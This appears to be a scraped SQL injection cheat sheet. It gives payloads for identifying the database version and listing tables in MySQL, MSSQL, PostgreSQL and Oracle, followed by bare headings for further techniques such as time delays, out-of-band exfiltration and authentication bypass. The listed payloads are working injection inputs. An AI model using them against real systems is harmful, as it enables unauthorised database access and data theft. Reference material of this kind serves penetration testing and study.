SQL Injection
Standard Cheatsheet
Determine database version
' UNION SELECT @@version (MySQL, MSSQL, MariaDB)
' UNION SELECT version() (PostgreSQL)
' SELECT * FROM v$version (Oracle)
' UNION SELECT BANNER,NULL FROM+ v$version-- (Oracle)List tables
// PostgreSQL, MySQL, MSSQL
' UNION SELECT * FROM information_schema.tables--
' UNION SELECT table_name FROM information_schema.tables--
// Oracle
' SELECT * FROM all_Tables
' SELECT table_name FROM all_TablesList columns
Get data from columns
Number of columns
Find column with useful data type
Substring
Case
Time delay
Out-of-Band techniques
Oracle
MSSQL
PostgreSQL
MySQL
MSSQL
Stacked Queries
MariaDB / MySQL
Update table
Node.js
Authentication Bypass

Last updated